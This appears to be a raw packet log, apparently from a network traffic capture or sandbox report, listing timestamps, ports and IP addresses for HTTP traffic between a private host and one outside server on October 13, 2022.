Oct 13, 2022 09:30:54.499522924 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499586105 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499625921 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499653101 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.499653101 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.499665976 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499712944 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499715090 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.499715090 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.499754906 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499768972 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.499799013 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499804020 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.499840021 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499845028 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.499882936 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499886990 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.499919891 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499932051 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.499960899 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499967098 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.500003099 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.500011921 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.500041962 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.500062943 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.500073910 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.500101089 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.500113964 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.500140905 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.500157118 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.500185013 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.500200033 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.500226021 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.500231981 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.500245094 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.500282049 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542006969 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542063951 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542104959 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542135954 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542151928 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542152882 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542152882 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542176008 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542217970 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542222977 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542222977 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542258024 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542258024 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542292118 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542310953 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542334080 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542336941 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542375088 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542377949 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542416096 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542418003 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542445898 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542459965 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542483091 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542485952 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542526007 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542529106 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542565107 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542570114 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542594910 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.542606115 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542634964 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.584462881 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.584501982 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.584525108 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.584599972 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.584636927 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.584636927 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.584636927 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.584697008 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.584733009 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.584760904 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.584804058 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.584825993 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.584944010 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.585036039 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.585130930 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.585212946 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.585269928 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.585347891 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.585385084 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.585458994 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.585479975 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.585549116 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.585585117 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.585653067 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.585690975 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.585764885 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.585802078 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.585872889 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.585938931 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.585999012 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.586014986 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.586075068 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.586082935 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.586138010 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.586149931 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.586240053 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.586277962 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.586350918 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627170086 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627224922 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627249956 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627266884 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627301931 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627306938 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627307892 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627341986 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627343893 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627382994 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627388954 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627425909 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627480030 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627522945 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627530098 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627563953 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627568007 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627604008 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627609968 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627638102 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627646923 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627679110 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627679110 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627722025 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627727032 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627763987 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627767086 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627794981 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.627809048 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.627837896 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.667911053 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.667968988 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.668009996 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.668042898 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.668087006 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.668175936 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.669675112 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.669718981 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.669761896 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.669770956 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.669792891 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.669802904 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.669832945 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.669832945 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.669852018 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.669879913 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.669894934 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.669919968 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.669950008 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.669960976 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.669980049 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.670032024 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.670355082 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.670396090 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.670435905 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.670458078 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.670475006 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.670492887 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.670531034 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.670581102 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.670622110 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.670639992 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.670661926 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.670681953 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.670701027 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.670727015 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.670746088 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.670780897 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.670797110 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.670830965 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.712492943 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.712548018 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.712588072 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.712630033 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.712670088 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.712675095 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.712675095 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.712676048 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.712711096 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.712745905 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.712747097 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.712745905 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.712774038 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.712790966 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.712825060 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.712833881 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.712846041 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.712873936 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.712898970 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.712914944 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.712933064 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.712955952 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.712974072 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.712995052 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.713016033 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.713033915 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.713073015 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.713078976 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.713098049 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.713114023 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.713150978 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.713176966 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.713247061 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.753318071 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.753402948 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.753421068 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.753470898 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.753524065 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.753525019 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.753576040 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.754987955 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.755048990 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.755110979 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.755148888 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.755157948 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.755167961 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.755208969 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.755217075 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.755276918 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.755305052 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.755332947 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.755336046 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.755379915 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.755425930 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.755439997 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.755487919 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.755498886 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.755544901 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.755557060 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.755599976 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.755603075 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.755661011 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.755718946 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.755729914 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.755759001 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.755778074 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.755781889 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.755820990 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.755875111 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.755882025 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.755934954 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.755940914 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.755985975 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.755999088 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.756043911 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.756057024 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.756093025 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.795928955 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.795990944 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.796015024 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.796055079 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.796094894 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.796104908 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.796118021 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.796155930 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.797621012 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.797678947 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.797683001 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.797734976 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.797777891 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.797801971 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.797801971 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.797849894 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.797866106 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.797924995 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.797982931 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.798023939 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.798023939 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.798042059 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.798055887 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.798091888 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
